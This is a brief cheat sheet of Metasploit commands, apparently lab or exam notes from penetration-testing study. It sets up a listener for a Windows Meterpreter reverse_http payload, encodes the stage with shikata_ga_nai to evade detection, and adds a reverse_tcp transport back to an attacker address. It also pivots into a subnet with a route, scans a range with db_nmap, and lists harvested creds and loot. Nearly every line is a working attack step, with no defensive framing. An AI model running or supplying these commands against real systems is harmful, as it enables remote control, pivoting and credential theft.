use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST $ip
set LPORT 443
set exitfunc thread
set EnableStageEncoding True
set ExitOnSession false
exploit -j
show adv
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
exploit -j
set AutoRunScript windows/gather/enum_logged_on_users
jobs -i 1
switch transports:
transport list
transport add -t reverse_tcp -l 192.168.118.2 -p 5555
transport next
Pivot :
route add 192.168.1.0/24 11
msfdb
Service postgresql start
Msfdb init
Workspace -a NEW
Workspace NEW
Db_nmap -sS -sV -Pn -n 10.11.1.0/24
Services
services -p 445 --rhosts
Hosts -S windows -R (add to current module – can also be filtered)
creds
loot